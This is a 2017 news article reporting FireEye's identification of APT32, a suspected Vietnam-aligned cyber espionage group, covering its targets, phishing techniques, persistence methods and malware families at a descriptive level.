APT32: Vietnamese Hackers Target Foreign Corporations
15.5.2017 securityweek APT
APT32 is the "newest named advanced persistent threat group," according to a new report from FireEye. Published yesterday, the report shows it to be a sophisticated and well-resourced cyber espionage actor targeting Vietnamese interests around the globe -- and although not-previously classified in the APTn schema, it has been operating since at least 2013. The APT designation was also commenced back in 2013, when Mandiant used it to describe the first hacking group, APT1, that it was willing to call 'state-sponsored'.
FireEye's analysis stops short of defining APT32 as another state-sponsored hacking group; but that is the clear suspicion. "APT32," writes Nick Carr, senior manager of FireEye's Mandiant Incident Response team, "leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests."
He subsequently told Reuters it was impossible to identify or locate the hackers precisely or confirm they were working for the Vietnamese government but the information they sought would be of very little use to any other party. He also said that in some cases the intrusions seemed to be assessing the victims' adherence to national regulations.
The Vietnamese government denies this. "The government of Vietnam does not allow any form of cyber-attacks against organizations or individuals," said foreign ministry spokeswoman Le Thi Thu Hang. "All cyber-attacks or threats to cybersecurity, must be condemned and severely punished in accordance with regulations and laws."
The APT32 targets include a European corporation that was about to construct a manufacturing facility in Vietnam in 2014; numerous Vietnamese and foreign corporations in 2016; a hospitality developer planning to expand operations in Vietnam in 2016; and the Vietnamese offices of a global consulting firm in 2017. In all cases, espionage would give the Vietnam government either a commercial advantage in discussions, or greater understanding of foreign companies within the country.
Other attacks, however, have been targeted at individuals outside of Vietnam -- more specifically governments, journalists, and members of the Vietnam diaspora who, warns Carr, "may continue to be targeted."
FireEye's isolation of APT32 followed its investigations into intrusions at several corporations with business interests in Vietnam. These investigations provided "sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye's newest named advanced persistent threat group: APT32."
FireEye's analysis of APT32's current campaign depicts a well-resourced and innovative attacker. It uses phishing emails containing a weaponized attachment. Unusually, the attachment is not a Word document but an ActiveMime (an undocumented Microsoft format) file. This file contains an OLE file containing malicious macros.
The attacker also used a novel approach to track the success of its phishing emails, using legitimate cloud-based email analytics. The phishing attachment can contain HTML image tags. "When a document with this feature is opened," writes Carr, "Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms."
If the macros are successfully loaded, they create two scheduled tasks to act as persistence mechanisms for two backdoors. The first launches Squiblydoo, an application whitelisting script protection bypass, to enable the download of a backdoor from APT's infrastructure. The second leads to a secondary backdoor delivered as a multi-stage PowerShell script configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.
APT32's persistence and obfuscation goes further. "Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon's Invoke-Obfuscation framework," notes the analysis.
It is APT32's use of a custom suite of backdoors that has helped FireEye tie different campaigns to this one particular group. That suite includes Windshield, Komprogo, Soundbite, Phoreal, and Beacon. "FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests," writes Carr. He warns that APT32 demonstrates that state-sponsored cyber espionage is no longer necessarily limited to the few known actors: China, Iran, Russia, and North Korea.
"As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets."